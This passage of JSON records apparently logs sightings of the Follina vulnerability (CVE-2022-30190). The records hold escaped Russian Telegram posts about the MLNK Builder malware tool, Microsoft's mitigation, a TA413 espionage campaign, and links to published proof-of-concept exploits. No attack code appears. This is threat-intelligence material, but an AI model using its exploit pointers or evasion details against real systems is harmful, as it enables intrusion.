\u0442\u0435\u043a\u0443\u0449\u0438\u0435 \u043a\u043b\u0438\u0435\u043d\u0442\u044b MLNK Builder \u043f\u043e\u043b\u0443\u0447\u0430\u044e\u0442 \u043e\u0431\u043d\u043e\u0432\u043b\u0435\u043d\u0438\u0435 \u0431\u0435\u0441\u043f\u043b\u0430\u0442\u043d\u043e, \u043d\u043e \u0430\u0432\u0442\u043e\u0440\u044b \u0442\u0430\u043a\u0436\u0435 \u0432\u044b\u043f\u0443\u0441\u0442\u0438\u043b\u0438 \u0438 \u043f\u0440\u0438\u0432\u0430\u0442\u043d\u0443\u044e \u0432\u0435\u0440\u0441\u0438\u044e \u0434\u043b\u044f \u0443\u0437\u043a\u043e\u0433\u043e \u043a\u0440\u0443\u0433\u0430 \u043f\u0440\u0438\u0432\u0438\u043b\u0435\u0433\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u044b\u0445 \u043e\u043f\u0435\u0440\u0430\u0442\u043e\u0440\u043e\u0432, \u0441 \u0434\u043e\u043f\u043e\u043b\u043d\u0438\u0442\u0435\u043b\u044c\u043d\u043e\u0439 \u043b\u0438\u0446\u0435\u043d\u0437\u0438\u0435\u0439 \u043f\u043e \u0446\u0435\u043d\u0435 125 \u0434\u043e\u043b\u043b\u0430\u0440\u043e\u0432 \u0437\u0430 \u0441\u0431\u043e\u0440\u043a\u0443.\n\n\u041e\u0431\u043d\u043e\u0432\u043b\u0435\u043d\u043d\u044b\u0439 \u0438\u043d\u0441\u0442\u0440\u0443\u043c\u0435\u043d\u0442 \u043f\u0440\u0435\u0434\u043e\u0441\u0442\u0430\u0432\u043b\u044f\u0435\u0442 \u0431\u043e\u0433\u0430\u0442\u044b\u0439 \u0430\u0440\u0441\u0435\u043d\u0430\u043b \u0434\u043b\u044f \u0441\u043e\u0437\u0434\u0430\u043d\u0438\u044f \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u044b\u0445 \u0444\u0430\u0439\u043b\u043e\u0432, \u0437\u0430\u043c\u0430\u0441\u043a\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u044b\u0445 \u043f\u043e\u0434 Microsoft Word, Adobe PDF, ZIP, JPG/.PNG, MP3 \u0438 \u0434\u0430\u0436\u0435 AVI, \u0430 \u0442\u0430\u043a\u0436\u0435 \u0431\u043e\u043b\u0435\u0435 \u043f\u0440\u043e\u0434\u0432\u0438\u043d\u0443\u0442\u044b\u0435 \u0444\u0443\u043d\u043a\u0446\u0438\u0438 \u0434\u043b\u044f \u0441\u043e\u043a\u0440\u044b\u0442\u0438\u044f \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u043e\u0439 \u043f\u043e\u043b\u0435\u0437\u043d\u043e\u0439 \u043d\u0430\u0433\u0440\u0443\u0437\u043a\u0438.\n\n\u0417\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0438 \u043f\u0440\u0438\u043c\u0435\u043d\u0438\u043b\u0438 \u0442\u0432\u043e\u0440\u0447\u0435\u0441\u043a\u0438\u0439 \u043f\u043e\u0434\u0445\u043e\u0434 \u0434\u043b\u044f \u043e\u0431\u043c\u0430\u043d\u0430 \u043c\u0435\u0445\u0430\u043d\u0438\u0437\u043c\u043e\u0432 \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0435\u043d\u0438\u044f \u0438 \u0434\u043e\u0441\u0442\u0430\u0432\u043a\u0438 \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u043e\u0439 \u043d\u0430\u0433\u0440\u0443\u0437\u043a\u0438, \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u044f \u043a\u043e\u043c\u0431\u0438\u043d\u0430\u0446\u0438\u044e \u0440\u0430\u0441\u0448\u0438\u0440\u0435\u043d\u0438\u0439 \u0438 \u0440\u0430\u0437\u043b\u0438\u0447\u043d\u044b\u0445 \u0444\u043e\u0440\u043c\u0430\u0442\u043e\u0432 \u0444\u0430\u0439\u043b\u043e\u0432, \u0430 \u0442\u0430\u043a\u0436\u0435 \u0431\u0438\u043d\u0430\u0440\u043d\u044b\u0435 \u0444\u0430\u0439\u043b\u044b Living Off the Land (LOLbins).\n\n\u0421\u0440\u0435\u0434\u0438 \u043d\u0430\u0438\u0431\u043e\u043b\u0435\u0435 \u0430\u043a\u0442\u0438\u0432\u043d\u043e \u043f\u043e\u0434\u0434\u0435\u0440\u0436\u0438\u0432\u0430\u044e\u0449\u0438\u0445 LNK \u0448\u0442\u0430\u043c\u043c\u043e\u0432 \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u043e\u0433\u043e \u041f\u041e Resecurity \u0432\u044b\u0434\u0435\u043b\u044f\u044e\u0442 TA570\u00a0Qakbot\u00a0(Qbot), IcedID, AsyncRAT\u00a0\u0438 Emotet. \u041f\u0440\u0438 \u044d\u0442\u043e\u043c \u043f\u043e\u0441\u043b\u0435\u0434\u043d\u044f\u044f \u043a\u0430\u043c\u043f\u0430\u043d\u0438\u044f \u043f\u043e \u0440\u0430\u0441\u043f\u0440\u043e\u0441\u0442\u0440\u0430\u043d\u0435\u043d\u0438\u044e Qakbot \u0442\u0430\u043a\u0436\u0435 \u0432\u043a\u043b\u044e\u0447\u0430\u043b\u0430 \u0438 \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u044b\u0435 \u0434\u043e\u043a\u0443\u043c\u0435\u043d\u0442\u044b Word \u0441\u00a0CVE-2022-30190 (Follina).", "creation_timestamp": "2022-07-20T12:07:09.000000Z"}, {"uuid": "588edee4-22c6-4038-b3d1-820876ef143b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "exploited", "source": "https://t.me/true_secator/2998", "content": "\u0418\u043c\u043f\u0435\u0440\u0438\u044f \u043d\u0430\u043d\u043e\u0441\u0438\u0442 \u043e\u0442\u0432\u0435\u0442\u043d\u044b\u0439 \u0443\u0434\u0430\u0440, \u043f\u0440\u0430\u0432\u0434\u0430 \u043d\u0435\u043f\u043e\u043d\u044f\u0442\u043d\u043e \u0432 \u043a\u0430\u043a\u0443\u044e \u0441\u0442\u043e\u0440\u043e\u043d\u0443.\n\n\u041f\u043e\u0441\u043b\u0435 \u0432\u0441\u0435\u043e\u0431\u0449\u0435\u0433\u043e \u043d\u0435\u0433\u043e\u0434\u043e\u0432\u0430\u043d\u0438\u044f Microsoft \u0432\u0441\u0435 \u0436\u0435 \u043f\u0440\u0438\u0441\u0432\u043e\u0438\u043b\u0438 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 Follina \u0438\u0434\u0435\u043d\u0442\u0438\u0444\u0438\u043a\u0430\u0442\u043e\u0440 CVE-2022-30190, \u043e\u0446\u0435\u043d\u0438\u0432 \u0435\u0435 \u043d\u0430 7,8 \u0438\u0437 10 \u043f\u043e CVSS. \u041e\u0444\u0438\u0446\u0438\u0430\u043b\u044c\u043d\u043e \u0443\u044f\u0437\u0432\u0438\u043c\u044b\u043c\u0438 \u0432\u0435\u0440\u0441\u0438\u044f\u043c\u0438 \u043f\u0440\u0438\u0437\u043d\u0430\u043d\u044b Microsoft Office Office 2013, Office 2016, Office 2019 \u0438 Office 2021, \u0430 \u0442\u0430\u043a\u0436\u0435 \u0432\u044b\u043f\u0443\u0441\u043a\u0438 Professional Plus.\n\n\u0420\u0430\u0437\u0440\u0430\u0431\u043e\u0442\u0447\u0438\u043a\u0438 \u043f\u043e\u0434\u0433\u043e\u0442\u043e\u0432\u0438\u043b\u0438 \u0438 \u043e\u043f\u0443\u0431\u043b\u0438\u043a\u043e\u0432\u0430\u043b\u0438 \u0434\u043e\u043f\u043e\u043b\u043d\u0438\u0442\u0435\u043b\u044c\u043d\u044b\u0435 \u0440\u0435\u043a\u043e\u043c\u0435\u043d\u0434\u0430\u0446\u0438\u0438 (\u0437\u0434\u0435\u0441\u044c), \u0432\u043a\u043b\u044e\u0447\u0430\u044f \u043e\u0431\u0445\u043e\u0434\u043d\u044b\u0435 \u043f\u0443\u0442\u0438 \u043f\u043e \u043e\u0442\u043a\u043b\u044e\u0447\u0435\u043d\u0438\u044e \u043f\u0440\u043e\u0442\u043e\u043a\u043e\u043b\u0430 URL-\u0430\u0434\u0440\u0435\u0441\u043e\u0432 MSDT \u0441 \u043f\u043e\u043c\u043e\u0449\u044c\u044e \u043c\u043e\u0434\u0438\u0444\u0438\u043a\u0430\u0446\u0438\u0438 \u0440\u0435\u0435\u0441\u0442\u0440\u0430 Windows, \u0447\u0442\u043e \u043e\u0431\u0435\u0441\u043f\u0435\u0447\u0438\u0432\u0430\u0435\u0442 \u043e\u0442\u043a\u0440\u044b\u0442\u0438\u0435 Microsoft Office \u0434\u043e\u043a\u0443\u043c\u0435\u043d\u0442\u043e\u0432 \u0438\u0437 \u0418\u043d\u0442\u0435\u0440\u043d\u0435\u0442\u0430 \u0432 \u0440\u0435\u0436\u0438\u043c\u0435 \u0437\u0430\u0449\u0438\u0449\u0435\u043d\u043d\u043e\u0433\u043e \u043f\u0440\u043e\u0441\u043c\u043e\u0442\u0440\u0430 \u0438\u043b\u0438 Application Guard \u0434\u043b\u044f Office \u043f\u043e \u0443\u043c\u043e\u043b\u0447\u0430\u043d\u0438\u044e.\n\n\u041f\u0435\u0440\u0432\u044b\u0435 \u043f\u0440\u0438\u0437\u043d\u0430\u043a\u0438 \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u0438 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u0432 \u0440\u0435\u0430\u043b\u044c\u043d\u043e\u0441\u0442\u0438 \u0434\u0430\u0442\u0438\u0440\u0443\u044e\u0442\u0441\u044f 12 \u0430\u043f\u0440\u0435\u043b\u044f 2022 \u0433\u043e\u0434\u0430, \u043a\u043e\u0433\u0434\u0430 \u0432 \u0431\u0430\u0437\u0443 \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u044b\u0445 \u043f\u0440\u043e\u0433\u0440\u0430\u043c\u043c \u0431\u044b\u043b \u0437\u0430\u0433\u0440\u0443\u0436\u0435\u043d \u0432\u0442\u043e\u0440\u043e\u0439 \u043e\u0431\u0440\u0430\u0437\u0435\u0446, \u043a\u043e\u0442\u043e\u0440\u044b\u0439 \u0431\u044b\u043b \u0437\u0430\u0442\u043e\u0447\u0435\u043d \u043f\u043e\u0434 \u0440\u043e\u0441\u0441\u0438\u0439\u0441\u043a\u043e\u0433\u043e \u043a\u043b\u0438\u0435\u043d\u0442\u0430, \u043e \u0447\u0435\u043c \u0441\u0432\u0438\u0434\u0435\u0442\u0435\u043b\u044c\u0441\u0442\u0432\u0443\u0435\u0442 \u043d\u0430\u0438\u043c\u0435\u043d\u043e\u0432\u0430\u043d\u0438\u0435 \u043f\u0440\u0438\u0433\u043b\u0430\u0448\u0435\u043d\u0438\u0435 \u043d\u0430 \u0438\u043d\u0442\u0435\u0440\u0432\u044c\u044e.doc \u0432 \u044d\u0444\u0438\u0440 \u0440\u0430\u0434\u0438\u043e Sputnik.\n\n\u041d\u043e \u0432\u0441\u0435 \u044d\u0442\u043e \u043d\u0438\u043a\u0430\u043a \u043d\u0435 \u043c\u0435\u043d\u044f\u0435\u0442 \u0442\u043e\u0433\u043e, \u0447\u0442\u043e Microsoft \u0435\u0449\u0451 21 \u0430\u043f\u0440\u0435\u043b\u044f \u0437\u0430\u043a\u0440\u044b\u043b\u0430 \u043e\u0442\u0447\u0435\u0442 \u0441\u043e \u0441\u0441\u044b\u043b\u043a\u043e\u0439 \u043d\u0430 \u0442\u043e, \u0447\u0442\u043e \u043f\u0440\u043e\u0431\u043b\u0435\u043c\u0430 \u0431\u044b\u043b\u0430 (\u0432\u043e\u0432\u0441\u0435 \u043d\u0435 \u043f\u0440\u043e\u0431\u043b\u0435\u043c\u0430) \u0443\u0441\u0442\u0440\u0430\u043d\u0435\u043d\u0430 \u0438 \u043d\u0435 \u043e\u0442\u043d\u043e\u0441\u0438\u0442\u0441\u044f \u043a \u0432\u043e\u043f\u0440\u043e\u0441\u0430\u043c \u0431\u0435\u0437\u043e\u043f\u0430\u0441\u043d\u043e\u0441\u0442\u0438.\n\n\u0412\u043f\u0440\u043e\u0447\u0435\u043c \u0447\u0435\u043c\u0443 \u0443\u0434\u0438\u0432\u043b\u044f\u0442\u044c\u0441\u044f.", "creation_timestamp": "2022-05-31T09:10:03.000000Z"}, {"uuid": "6458d13c-2967-4ea6-9afc-7231b57caa45", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "exploited", "source": "https://t.me/true_secator/3478", "content": "\u041f\u0440\u043e\u043f\u0440\u0430\u0432\u0438\u0442\u0435\u043b\u044c\u0441\u0442\u0432\u0435\u043d\u043d\u0430\u044f \u0445\u0430\u043a\u0435\u0440\u0441\u043a\u0430\u044f \u0433\u0440\u0443\u043f\u043f\u0438\u0440\u043e\u0432\u043a\u0430 TA413 (\u0442\u0430\u043a\u0436\u0435 \u0438\u0437\u0432\u0435\u0441\u0442\u043d\u0430\u044f \u043a\u0430\u043a LuckyCat), \u0441\u0432\u044f\u0437\u0430\u043d\u043d\u0430\u044f \u0441 \u041a\u0438\u0442\u0430\u0435\u043c \u0431\u044b\u043b\u0430 \u0437\u0430\u043c\u0435\u0447\u0435\u043d\u0430 \u0432 \u0430\u0442\u0430\u043a\u0430\u0445 \u043d\u0430 \u041f\u0440\u0430\u0432\u0438\u0442\u0435\u043b\u044c\u0441\u0442\u0432\u043e \u0422\u0438\u0431\u0435\u0442\u0430 \u0432 \u0438\u0437\u0433\u043d\u0430\u043d\u0438\u0438 \u0438\u043b\u0438 \u043a\u0430\u043a \u0435\u0435 \u0435\u0449\u0435 \u043d\u0430\u0437\u044b\u0432\u0430\u044e\u0442 \u0426\u0435\u043d\u0442\u0440\u0430\u043b\u044c\u043d\u043e\u0439 \u0442\u0438\u0431\u0435\u0442\u0441\u043a\u043e\u0439 \u0430\u0434\u043c\u0438\u043d\u0438\u0441\u0442\u0440\u0430\u0446\u0438\u0435\u0439.\n\n\u0412 \u0440\u0430\u043c\u043a\u0430\u0445 \u0448\u043f\u0438\u043e\u043d\u0441\u043a\u043e\u0439 \u043a\u0430\u043c\u043f\u0430\u043d\u0438\u0438 APT \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043b\u0438 \u043d\u0435\u0434\u0430\u0432\u043d\u043e \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0435\u043d\u043d\u044b\u0435 \u043d\u0435\u0434\u043e\u0441\u0442\u0430\u0442\u043a\u0438 \u0432 \u0431\u0440\u0430\u043d\u0434\u043c\u0430\u0443\u044d\u0440\u0435 Sophos \u0438 Microsoft Office (CVE-2022-1040 \u0438 CVE-2022-30190) \u0434\u043b\u044f \u0440\u0430\u0437\u0432\u0435\u0440\u0442\u044b\u0432\u0430\u043d\u0438\u044f \u043d\u0435\u0438\u0437\u0432\u0435\u0441\u0442\u043d\u043e\u0433\u043e \u0440\u0430\u043d\u0435\u0435 \u0431\u044d\u043a\u0434\u043e\u0440\u0430 LOWZERO.\n\n\u0412 \u043e\u0441\u043d\u043e\u0432\u043d\u043e\u043c \u0446\u0435\u043b\u044f\u043c\u0438 \u0431\u044b\u043b\u0438 \u043e\u0440\u0433\u0430\u043d\u0438\u0437\u0430\u0446\u0438\u0438, \u0441\u0432\u044f\u0437\u0430\u043d\u043d\u044b\u0435 \u0441 \u0442\u0438\u0431\u0435\u0442\u0441\u043a\u043e\u0439 \u043e\u0431\u0449\u0438\u043d\u043e\u0439, \u0432 \u0442\u043e\u043c \u0447\u0438\u0441\u043b\u0435 \u0438 \u043f\u0440\u0435\u0434\u043f\u0440\u0438\u044f\u0442\u0438\u044f, \u0441\u0432\u044f\u0437\u0430\u043d\u043d\u044b\u0435 \u0441 \u0442\u0438\u0431\u0435\u0442\u0441\u043a\u0438\u043c \u043f\u0440\u0430\u0432\u0438\u0442\u0435\u043b\u044c\u0441\u0442\u0432\u043e\u043c \u043e \u0447\u0435\u043c \u0433\u043e\u0432\u043e\u0440\u0438\u0442\u0441\u044f \u0432 \u043e\u0442\u0447\u0435\u0442\u0435 Recorded Future.\n\n\u0410\u0442\u0430\u043a\u0438 LuckyCat \u043d\u0430 \u043e\u0440\u0433\u0430\u043d\u0438\u0437\u0430\u0446\u0438\u0438 \u0438 \u043e\u0442\u0434\u0435\u043b\u044c\u043d\u044b\u0445 \u043b\u0438\u0446, \u0441\u0432\u044f\u0437\u0430\u043d\u043d\u044b\u0445 \u0441 \u0442\u0438\u0431\u0435\u0442\u0441\u043a\u0438\u043c \u0441\u043e\u043e\u0431\u0449\u0435\u0441\u0442\u0432\u043e\u043c, \u043f\u0440\u043e\u0434\u043e\u043b\u0436\u0430\u044e\u0442\u0441\u044f \u043f\u043e \u043a\u0440\u0430\u0439\u043d\u0435\u0439 \u043c\u0435\u0440\u0435 \u0441 2020 \u0433\u043e\u0434\u0430 \u0441 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u0435\u043c \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u044b\u0445 \u043f\u0440\u043e\u0433\u0440\u0430\u043c\u043c, \u0442\u0430\u043a\u0438\u0445 \u043a\u0430\u043a ExileRAT, Sepulcher \u0438 \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u043e\u0433\u043e \u0440\u0430\u0441\u0448\u0438\u0440\u0435\u043d\u0438\u044f \u0431\u0440\u0430\u0443\u0437\u0435\u0440\u0430 Mozilla Firefox, \u043f\u043e\u043b\u0443\u0447\u0438\u0432\u0448\u0435\u0433\u043e \u043d\u0430\u0437\u0432\u0430\u043d\u0438\u0435 FriarFox .\n\n\u0412 \u0446\u0435\u043b\u0435\u0432\u043e\u0439 \u0444\u0438\u0448\u0438\u043d\u0433\u043e\u0432\u043e\u0439 \u0430\u0442\u0430\u043a\u0435 \u043f\u0440\u0438\u043c\u0435\u043d\u044f\u043b\u0441\u044f \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u044b\u0439 RTF-\u0434\u043e\u043a\u0443\u043c\u0435\u043d\u0442, \u0432 \u043a\u043e\u0442\u043e\u0440\u043e\u043c \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043b\u0438\u0441\u044c \u043d\u0435\u0434\u043e\u0441\u0442\u0430\u0442\u043a\u0438 \u0432 \u0440\u0435\u0434\u0430\u043a\u0442\u043e\u0440\u0435 Microsoft Equation Editor \u0434\u043b\u044f \u0434\u043e\u0441\u0442\u0430\u0432\u043a\u0438 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044c\u0441\u043a\u043e\u0433\u043e \u0438\u043c\u043f\u043b\u0430\u043d\u0442\u0430\u0442\u0430 LOWZERO. \u0412 \u0441\u043e\u0432\u043e\u043a\u0443\u043f\u043d\u043e\u0441\u0442\u0438 \u044d\u0442\u043e \u0431\u044b\u043b\u043e \u0434\u043e\u0441\u0442\u0438\u0433\u043d\u0443\u0442\u043e \u0437\u0430 \u0441\u0447\u0435\u0442 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u044f \u0438\u043d\u0441\u0442\u0440\u0443\u043c\u0435\u043d\u0442\u0430 Royal Road RTF, \u043a\u043e\u0442\u043e\u0440\u044b\u0439 \u0448\u0438\u0440\u043e\u043a\u043e \u0440\u0430\u0441\u043f\u0440\u043e\u0441\u0442\u0440\u0430\u043d\u0435\u043d \u0441\u0440\u0435\u0434\u0438 \u043a\u0438\u0442\u0430\u0439\u0441\u043a\u0438\u0445 \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u043e\u0432.\n\n\u0412 \u0434\u0440\u0443\u0433\u043e\u043c \u044d\u043b\u0435\u043a\u0442\u0440\u043e\u043d\u043d\u043e\u043c \u043f\u0438\u0441\u044c\u043c\u0435, \u043f\u043e\u043b\u0443\u0447\u0435\u043d\u043d\u043e\u0439 \u0442\u0438\u0431\u0435\u0442\u0441\u043a\u043e\u0439 \u0436\u0435\u0440\u0442\u0432\u043e\u0439 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043b\u043e\u0441\u044c \u0432\u043b\u043e\u0436\u0435\u043d\u0438\u0435 Microsoft Word, \u0440\u0430\u0437\u043c\u0435\u0449\u0435\u043d\u043d\u043e\u0435 \u0432 \u0441\u043b\u0443\u0436\u0431\u0435 Google Firebase, \u043a\u043e\u0442\u043e\u0440\u043e\u0435 \u043f\u044b\u0442\u0430\u043b\u043e\u0441\u044c \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u044c \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c Follina \u0434\u043b\u044f \u0432\u044b\u043f\u043e\u043b\u043d\u0435\u043d\u0438\u044f \u043a\u043e\u043c\u0430\u043d\u0434\u044b PowerShell \u0441 \u043f\u043e\u0441\u043b\u0435\u0434\u0443\u044e\u0449\u0435\u0439 \u0437\u0430\u0433\u0440\u0443\u0437\u043a\u043e\u0439 \u0431\u044d\u043a\u0434\u043e\u0440\u0430 \u0441 \u0443\u0434\u0430\u043b\u0435\u043d\u043d\u043e\u0433\u043e \u0441\u0435\u0440\u0432\u0435\u0440\u0430.\n\n\u0411\u044d\u043a\u0434\u043e\u0440 LOWZERO \u0438\u043c\u0435\u0435\u0442 \u043c\u043e\u0434\u0443\u043b\u044c\u043d\u0443\u044e \u0441\u0442\u0440\u0443\u043a\u0442\u0443\u0440\u0443 \u0438 \u0437\u0430\u0433\u0440\u0443\u0436\u0430\u0435\u0442 \u043d\u0435\u043e\u0431\u0445\u043e\u0434\u0438\u043c\u044b\u0435 \u043e\u043f\u0440\u0435\u0434\u0435\u043b\u0435\u043d\u043d\u044b\u0435 \u043c\u043e\u0434\u0443\u043b\u0438 \u0441 C2, \u0435\u0441\u043b\u0438 \u0441\u043a\u043e\u043c\u043f\u0440\u043e\u043c\u0435\u0442\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u0430\u044f \u043c\u0430\u0448\u0438\u043d\u0430 \u043f\u0440\u0435\u0434\u0441\u0442\u0430\u0432\u043b\u044f\u0435\u0442 \u0438\u043d\u0442\u0435\u0440\u0435\u0441 \u0434\u043b\u044f \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0430.\n\n\u0418\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u0442\u0435\u043b\u044f\u043c \u0443\u0434\u0430\u043b\u043e\u0441\u044c \u0441\u0432\u044f\u0437\u0430\u0442\u044c \u043d\u0435\u0441\u043a\u043e\u043b\u044c\u043a\u043e \u043a\u0430\u043c\u043f\u0430\u043d\u0438\u0439 \u0441 \u0434\u0435\u044f\u0442\u0435\u043b\u044c\u043d\u043e\u0441\u0442\u044c\u044e \u0433\u0440\u0443\u043f\u043f\u044b \u0438\u0437-\u0437\u0430 \u0442\u043e\u0433\u043e, \u0447\u0442\u043e \u0441\u0443\u0431\u044a\u0435\u043a\u0442\u044b \u0443\u0433\u0440\u043e\u0437\u044b \u0440\u0435\u0433\u0443\u043b\u044f\u0440\u043d\u043e \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043b\u0438 \u043e\u0434\u043d\u0438 \u0438 \u0442\u0435 \u0436\u0435 \u0430\u0434\u0440\u0435\u0441\u0430 \u043e\u0442\u043f\u0440\u0430\u0432\u0438\u0442\u0435\u043b\u0435\u0439 \u044d\u043b\u0435\u043a\u0442\u0440\u043e\u043d\u043d\u043e\u0439 \u043f\u043e\u0447\u0442\u044b \u0432 \u0442\u0435\u0447\u0435\u043d\u0438\u0435 \u043d\u0435\u0441\u043a\u043e\u043b\u044c\u043a\u0438\u0445 \u043b\u0435\u0442 (\u0442\u0430\u043a\u0438\u0435 \u043a\u0430\u043a tseringkanyaq@yahoo[.]com \u0438 mediabureauin@gmail[.]com).\n\n\u0421\u043e \u0441\u043b\u043e\u0432 \u044d\u043a\u0441\u043f\u0435\u0440\u0442\u043e\u0432, \u0433\u0440\u0443\u043f\u043f\u0430 \u043f\u0440\u043e\u0434\u043e\u043b\u0436\u0430\u0435\u0442 \u0432\u043d\u0435\u0434\u0440\u044f\u0442\u044c \u043d\u043e\u0432\u044b\u0435 \u0432\u043e\u0437\u043c\u043e\u0436\u043d\u043e\u0441\u0442\u0438, \u043f\u043e\u043b\u0430\u0433\u0430\u044f\u0441\u044c \u043f\u0440\u0438 \u044d\u0442\u043e\u043c \u043d\u0430 \u043f\u0440\u043e\u0432\u0435\u0440\u0435\u043d\u043d\u044b\u0435 \u043f\u0440\u0430\u043a\u0442\u0438\u043a\u043e\u0439 TTP.", "creation_timestamp": "2022-09-27T16:57:07.000000Z"}, {"uuid": "feed85d9-e3ba-4883-b94b-4edea94de93c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "exploited", "source": "Telegram/YfHS_0gw6mIFdSry5hyGG3ScC-HwbDfpqg-NLNfkx1fDKy8", "content": "", "creation_timestamp": "2022-06-14T02:39:12.000000Z"}, {"uuid": "d1825c9f-ef91-4a01-a640-679c2d8d74b4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "published-proof-of-concept", "source": "https://t.me/reverse_dungeon/2018", "content": "\ud83d\udcc3 \u042d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u044f MSDT 0-Day (CVE-2022-30190)\n \n\u0412\u0447\u0435\u0440\u0430 \u043f\u043e\u044f\u0432\u0438\u043b\u043e\u0441\u044c \u0431\u0443\u0440\u043d\u043e\u0435 \u043e\u0431\u0441\u0443\u0436\u0434\u0435\u043d\u0438\u0435 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u0432 \u043a\u043e\u043c\u043f\u043e\u043d\u0435\u043d\u0442\u0435 Microsoft Windows Support Diagnostic Tool (MSDT), \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u044e\u0449\u0435\u0439 \u0432\u044b\u043f\u043e\u043b\u043d\u0438\u0442\u044c \u043f\u0440\u043e\u0438\u0437\u0432\u043e\u043b\u044c\u043d\u044b\u0439 \u043a\u043e\u0434 \u043d\u0430 \u043c\u0430\u0448\u0438\u043d\u0435 \u0436\u0435\u0440\u0442\u0432\u044b \u043f\u0440\u0438 \u043e\u0442\u043a\u0440\u044b\u0442\u0438\u0438 \u0444\u0430\u0439\u043b\u0430, \u0442\u0430\u043a\u043e\u0433\u043e \u043a\u0430\u043a Word.\n\n\u041d\u0430\u0438\u0431\u043e\u043b\u0435\u0435 \u043f\u043e\u0434\u0440\u043e\u0431\u043d\u043e\u0435 \u043e\u043f\u0438\u0441\u0430\u043d\u0438\u0435 \u0441\u043c\u043e\u0442\u0440\u0438\u0442\u0435 \u0432 \u0431\u043b\u043e\u0433\u0435 \u0414\u0436\u043e\u043d\u0430 \u0425\u0430\u043c\u043c\u043e\u043d\u0434\u0430, \u0430 \u0442\u0430\u043a\u0436\u0435 \u0441\u043c\u043e\u0442\u0440\u0438\u0442\u0435 \u0432\u0438\u0434\u0435\u043e \u043e\u0442 \u043d\u0435\u0433\u043e, \u0441 \u043f\u043e\u044f\u0441\u043d\u0435\u043d\u0438\u0435\u043c \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u0438 \u043f\u0440\u0438\u043c\u0435\u0440\u043e\u043c \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u0438. \u042d\u043a\u0441\u043f\u043b\u043e\u0438\u0442 \u0442\u0430\u043a\u0436\u0435 \u0434\u043e\u0441\u0442\u0443\u043f\u0435\u043d \u043f\u043e \u0441\u0441\u044b\u043b\u043a\u0435 \u043d\u0438\u0436\u0435.\n\n\u0421\u0441\u044b\u043b\u043a\u0430 \u043d\u0430 \u0432\u0438\u0434\u0435\u043e\n\u0421\u0441\u044b\u043b\u043a\u0430 \u043d\u0430 PoC\n\n#redteam #rce #cve #windows", "creation_timestamp": "2022-06-02T14:10:28.000000Z"}, {"uuid": "0d38acc5-2458-4402-913a-ae0fa170f7ab", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "published-proof-of-concept", "source": "https://t.me/crackcodes/643", "content": "https://www.hackbyte.org/microsoft-office-cve-2022-30190-vulnerability-follina-exploitation/", "creation_timestamp": "2022-06-03T08:12:32.000000Z"}, {"uuid": "53433230-d877-4499-8d44-80e2b73adc2c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "seen", "source": "https://t.me/reverse_dungeon/2035", "content": "#cve #MSDT\n\n[ CVE-2022-30190 